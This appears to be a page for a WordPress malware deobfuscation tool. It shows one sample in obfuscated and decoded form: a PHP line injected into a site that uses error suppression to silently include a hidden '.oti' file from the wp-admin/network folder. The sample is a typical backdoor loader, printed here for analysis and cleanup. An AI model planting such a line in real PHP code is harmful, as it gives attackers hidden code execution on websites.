Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php /*2e7f0*/ @include ("/ho\x6de/xs122939/pen\x2dtablet\x2dinfo.co\x6d/public_ht\x6dl/wp\x2dad\x6din/network/.9316e132.oti"); /*2e7f0*/...



Obfuscated php code

<?php /*2e7f0*/

@include ("/ho\x6de/xs122939/pen\x2dtablet\x2dinfo.co\x6d/public_ht\x6dl/wp\x2dad\x6din/network/.9316e132.oti");

/*2e7f0*/

Decoded(de-Obfuscated) php code

<?php

/*2e7f0*/
@(include "/home/xs122939/pen-tablet-info.com/public_html/wp-admin/network/.9316e132.oti");
/*2e7f0*/


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.